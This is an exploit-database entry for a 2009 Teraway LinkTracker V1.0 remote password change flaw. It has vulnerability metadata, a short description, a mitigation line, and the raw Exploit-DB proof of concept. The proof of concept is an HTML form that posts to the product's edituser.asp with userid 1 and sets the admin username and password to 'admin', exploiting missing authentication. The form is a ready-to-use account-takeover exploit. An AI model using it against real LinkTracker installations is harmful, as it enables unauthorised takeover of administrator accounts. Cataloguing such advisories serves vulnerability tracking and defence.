header-logo
Suggest Exploit
vendor:
LinkTracker
by:
ThE g0bL!N Fi Khater Cristal wa x.CJP.x
7,5
CVSS
HIGH
Remote Password Change
287
CWE
Product Name: LinkTracker
Affected Version From: V1.0
Affected Version To: V1.0
Patch Exists: YES
Related CWE: N/A
CPE: a:teraway:linktracker:1.0
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
2009

Teraway LinkTracker V1.0 Remote Password Change

A vulnerability in Teraway LinkTracker V1.0 allows an attacker to change the password of any user. This is due to a lack of authentication when changing the password. An attacker can exploit this vulnerability by sending a malicious request to the vulnerable server.

Mitigation:

Upgrade to the latest version of Teraway LinkTracker V1.0 or apply the patch provided by the vendor.
Source

Exploit-DB raw data:

<title>Teraway LinkTracker V1.0  Remote Password Change</title>
<form name="form1" method="post" action="http://www.teraway.com/linktracker/demo/edituser.asp">
  <table width="90%" border="0" cellspacing="2" cellpadding="2" align="center">
    <tr>
      <td class="Titles">Cod[3]d By ThE g0bL!N Fi Khater Cristal wa x.CJP.x :)</td>

        
        <input type="hidden" name="userid" value="1">
         </td>
    </tr>
    <tr>
      <td colspan="2" bgcolor="#666666"></td>
    </tr>
    <tr align="left" valign="top" class="optionname">
      <td width="200"><b>Name :</b></td>

      
    </tr>
    <tr align="left" valign="top" class="optionname">
      <td width="200"><b>E-mail :</b></td>
      <td> <input type="text" name="email" size="40" value="email@here.com" maxlength="250">
      </td>
    </tr>
    <tr align="left" valign="top" class="optionname">
      <td width="200"><b>Username :</b></td>

      <td> <input type="text" name="usr" size="40" value="admin" maxlength="250">
      </td>
    </tr>
    <tr align="left" valign="top" class="optionname">
      <td width="200"><b>Password :</b></td>
      <td> <input type="password" name="pwd" size="40" value="admin" maxlength="250">
      </td>
    </tr>
   
      </td>
    </tr>
    <tr class="optionname">
      <td width="200">&nbsp; </td>
      <td> <input name="button" type="submit" class="generalText" value="Save User" onclick="alerta();">
      </td>
    </tr>

    <tr>
      <td colspan="2" bgcolor="#666666"></td>
    </tr>
  </table>
</form>
</body>
</html>

# milw0rm.com [2009-04-27]

Navigation

Suggest Exploit

Services By CQR